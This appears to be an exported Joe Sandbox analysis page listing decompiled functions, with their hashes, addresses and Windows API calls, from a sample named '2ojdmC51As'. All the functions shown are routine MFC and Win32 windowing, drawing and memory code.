Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769

Uniqueness

Uniqueness Score: -1.00%

Function 00425A9A, Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E00425860(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x42e2ac;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x4399c8
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x4399c0
					_t48 = _t11;
					E00425807(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x4399c8
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x4
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x4
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E0041007F(_t48);
						}
						_t17 =  &(_t61[3]); // 0x4
						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x4
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

0x00425a9d
0x00425aa0
0x00425aab
0x00425aaf
0x00425acd
0x00425ad4
0x00425ae0
0x00425ad6
0x00425ad6
0x00425adc
0x00425adc
0x00425ae2
0x00425ae6
0x00425aea
0x00425aea
0x00425aed
0x00425af1
0x00425af4
0x00425afb
0x00425afb
0x00425afe
0x00425b03
0x00425b07
0x00000000
0x00425ab1
0x00425ab4
0x00425ab4
0x00425ab9
0x00425b0d
0x00425b0d
0x00425b12
0x00425b25
0x00425b2a
0x00425b2f
0x00425b14
0x00425b14
0x00425b1d
0x00425b1d
0x00425b37
0x00425b3a
0x00425b3c
0x00425b3c
0x00425b4b
0x00425b5b
0x00425b60
0x00425b66
0x00425b6b
0x00425b6b
0x00425ab9
0x00425b71
0x00425b7c
0x00425b81

APIs

TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041445E, Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041445E(intOrPtr* __ecx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				E00406520(E00429E3C, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
				E00424BFB();
				E00412F19();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E00414CEF(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0xf107);
					E0041BB7E(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00424BFB();
				_t37 = E00412F2E();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

0x0041445e
0x00414463
0x00414468
0x0041446b
0x00414475
0x00414478
0x00414480
0x0041448b
0x00414496
0x0041449c
0x0041449c
0x004144a2
0x004144b0
0x004144bd
0x004144c2
0x004144ca
0x004144d2
0x004144df
0x004144e4
0x004144ec
0x004144f3
0x004144f3
0x00414507
0x0041450d
0x00414510
0x00414512
0x00414514
0x00414515
0x0041451a
0x0041451a
0x0041451f
0x00414523
0x0041452b
0x00414535
0x0041453d

APIs

__EH_prolog.LIBCMT ref: 00414463
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144B0
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004144D2
GetCapture.USER32 ref: 004144E4
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004144F3
WinHelpA.USER32 ref: 00414507

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64

Uniqueness

Uniqueness Score: -1.00%

Function 004232C5, Relevance: 9.1, APIs: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
				struct tagRECT _v20;
				struct HBRUSH__* _t46;
				long _t50;
				struct HBRUSH__* _t52;
				intOrPtr _t59;
				struct HBRUSH__* _t60;
				long _t64;
				struct HBRUSH__* _t66;
				intOrPtr _t70;
				intOrPtr _t72;

				CopyRect( &_v20, _a8);
				_v20.right = _v20.left + _a12;
				_t46 = _a20;
				if(_t46 != 0) {
					_t46 =  *(_t46 + 4);
				}
				_t72 = _a4;
				FillRect( *(_t72 + 4),  &_v20, _t46);
				_t50 = _a8->right;
				_v20.right = _t50;
				_v20.left = _t50 - _a12;
				_t52 = _a20;
				if(_t52 != 0) {
					_t52 =  *(_t52 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t52);
				CopyRect( &_v20, _a8);
				_t70 = _a16;
				_v20.bottom = _v20.top + _t70;
				_t59 = _a12;
				_v20.left = _v20.left + _t59;
				_v20.right = _v20.right - _t59;
				_t60 = _a20;
				if(_t60 != 0) {
					_t60 =  *(_t60 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t60);
				_t64 = _a8->bottom;
				_v20.bottom = _t64;
				_v20.top = _t64 - _t70;
				_t66 = _a20;
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				return FillRect( *(_t72 + 4),  &_v20, _t66);
			}

0x004232db
0x004232e5
0x004232e8
0x004232ed
0x004232ef
0x004232ef
0x004232f2
0x00423303
0x00423308
0x0042330b
0x00423311
0x00423314
0x00423319
0x0042331b
0x0042331b
0x00423326
0x0042332f
0x00423331
0x00423339
0x0042333c
0x0042333f
0x00423342
0x00423345
0x0042334a
0x0042334c
0x0042334c
0x00423357
0x0042335c
0x0042335f
0x00423364
0x00423367
0x0042336c
0x0042336e
0x0042336e
0x0042337f

APIs

CopyRect.USER32 ref: 004232DB
FillRect.USER32 ref: 00423303
FillRect.USER32 ref: 00423326
CopyRect.USER32 ref: 0042332F
FillRect.USER32 ref: 00423357
FillRect.USER32 ref: 00423379

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD49, Relevance: 9.1, APIs: 6, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CD49(void* __ecx, void* __eflags) {
				void* _t57;
				void* _t75;
				void* _t77;

				E00406520(E0042A90C, _t77);
				_t75 = __ecx;
				_push(__ecx);
				E0041A41D(_t77 - 0x40, __eflags);
				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
				E0041A2F1(_t75, _t77 - 0x1c);
				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				_t57 = E0041A48F(_t77 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t57;
			}

0x0041ee8e
0x0041ee97
0x0041ee9a
0x0041ee9e
0x0041eea3
0x0041eeae
0x0041eebb
0x0041eec7
0x0041eee2
0x0041eeeb
0x0041ef00
0x0041ef0c
0x0041ef18
0x0041ef27
0x0041ef37
0x0041ef3c
0x0041ef43
0x0041ef4d
0x0041ef55

APIs

__EH_prolog.LIBCMT ref: 0041EE8E

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

GetClientRect.USER32 ref: 0041EEAE
GetWindowRect.USER32 ref: 0041EEBB

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

OffsetRect.USER32(?,?,?), ref: 0041EEE2

Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175

OffsetRect.USER32(?,?,?), ref: 0041EF00

Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7

SendMessageA.USER32(?,00000014,?,00000000), ref: 0041EF27

Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC7, Relevance: 9.1, APIs: 6, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				struct HDC__* _v48;
				struct HDC__* _v52;
				char _v56;
				struct tagTEXTMETRICA _v112;
				void* __ebp;
				void* _t28;
				int _t38;
				intOrPtr* _t43;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;

				_t56 = __ecx;
				_push(0);
				E0041A369( &_v56, __eflags);
				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_v8 = 0;
				if(_t28 != 0) {
					_v8 = SelectObject(_v52, _t28);
				}
				GetTextMetricsA(_v48,  &_v112);
				_t63 = _v8;
				if(_v8 != 0) {
					SelectObject(_v52, _v8);
				}
				E0041A3DB( &_v56);
				SetRectEmpty( &_v36);
				E00424F9B(_t56, _t63,  &_v36, _a12);
				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
				_t38 = GetSystemMetrics(6);
				_t57 =  *((intOrPtr*)(_t56 + 0x78));
				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				if(_t55 < _t57) {
					_t55 = _t57;
				}
				_t43 = _a4;
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) = _t55;
				return _t43;
			}

0x0041bdd0
0x0041bdd7
0x0041bdd8
0x0041bde4
0x0041bdf2
0x0041bdf5
0x0041bdfd
0x0041bdfd
0x0041be07
0x0041be0d
0x0041be10
0x0041be18
0x0041be18
0x0041be1d
0x0041be26
0x0041be35
0x0041be48
0x0041be5b
0x0041be67
0x0041be71
0x0041be77
0x0041be79
0x0041be79
0x0041be7b
0x0041be80
0x0041be82
0x0041be87

APIs

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041BDE4
SelectObject.GDI32(?,00000000), ref: 0041BDFB
GetTextMetricsA.GDI32(?,?), ref: 0041BE07
SelectObject.GDI32(?,?), ref: 0041BE18
SetRectEmpty.USER32(?), ref: 0041BE26
GetSystemMetrics.USER32 ref: 0041BE5B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBD7, Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E0041BC73();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E00404DAE();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}

0x0041bbdf
0x0041bbe7
0x0041bbe9
0x0041bc50
0x0041bc5e
0x0041bbff
0x0041bc01
0x0041bc03
0x0041bc05
0x0041bc10
0x0041bc12
0x0041bc1f
0x0041bc1f
0x0041bc21
0x0041bc27
0x0041bc2b
0x0041bc67
0x0041bc3c
0x0041bc3f
0x0041bc41
0x0041bc41
0x0041bc2b
0x0041bc70
0x00000000
0x00000000
0x00000000
0x0041bc07
0x0041bc07
0x0041bc08
0x0041bc0a
0x0041bc0c
0x00000000
0x0041bc07
0x0041bc63
0x0041bc4c
0x0041bc4e
0x00000000
0x00000000
0x00000000
0x0041bc4e
0x0041bbeb
0x0041bbf2
0x0041bc49
0x0041bc49
0x00000000
0x0041bc49
0x0041bbf4
0x0041bbfb
0x00000000
0x00000000
0x0041bbfd
0x00000000

APIs

GetParent.USER32(?), ref: 0041BC0A
GetLastActivePopup.USER32(?), ref: 0041BC19
IsWindowEnabled.USER32(?), ref: 0041BC2E
EnableWindow.USER32(?,00000000), ref: 0041BC41
GetWindowLongA.USER32 ref: 0041BC53
GetParent.USER32(?), ref: 0041BC61

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00420A8B, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420A8B(intOrPtr _a4) {
				intOrPtr _v4;
				struct HWND__* _t15;
				struct HWND__* _t17;
				signed int _t21;
				intOrPtr _t28;
				void* _t30;
				struct HWND__* _t32;

				_v4 = _t28;
				_t15 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t15;
				if(_t32 == 0) {
					return _t15;
				} else {
					while(1) {
						_push(_t32);
						_t30 = E00413767();
						if(_t30 != 0) {
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
								_t21 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
										ShowWindow(_t32, 4);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
									}
								} else {
									if((_t21 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
						if(_t32 == 0) {
							return _t17;
						}
					}
				}
			}

0x00420a8e
0x00420aa1
0x00420aa3
0x00420aa7
0x00420b20
0x00420aa9
0x00420ab1
0x00420ab1
0x00420ab7
0x00420abb
0x00420ac1
0x00420ac6
0x00420ad6
0x00420ae1
0x00420aff
0x00420b0a
0x00420b0c
0x00420b0c
0x00420ae3
0x00420aed
0x00420af2
0x00420af4
0x00420af4
0x00420aed
0x00420ae1
0x00420ac6
0x00420b13
0x00420b15
0x00420b19
0x00000000
0x00420b1c
0x00420b19
0x00420ab1

APIs

GetDesktopWindow.USER32 ref: 00420A94
GetWindow.USER32(00000000), ref: 00420AA1
GetWindowLongA.USER32 ref: 00420AD6
ShowWindow.USER32(00000000,00000000), ref: 00420AF2
ShowWindow.USER32(00000000,00000004), ref: 00420B0A
GetWindow.USER32(00000000,00000002), ref: 00420B13

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042986F, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042986F(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E004298F1(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E004296EA(_t14, __ecx, 0, 0);
			}

0x00429872
0x00429873
0x00429884
0x0042988f
0x00429898
0x0042989b
0x004298a5
0x004298b3
0x004298c3
0x004298de
0x004298f0

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
GetDeviceCaps.GDI32(?,00000008), ref: 0042988D

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetMapMode.GDI32(?,00000001), ref: 004298A5
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
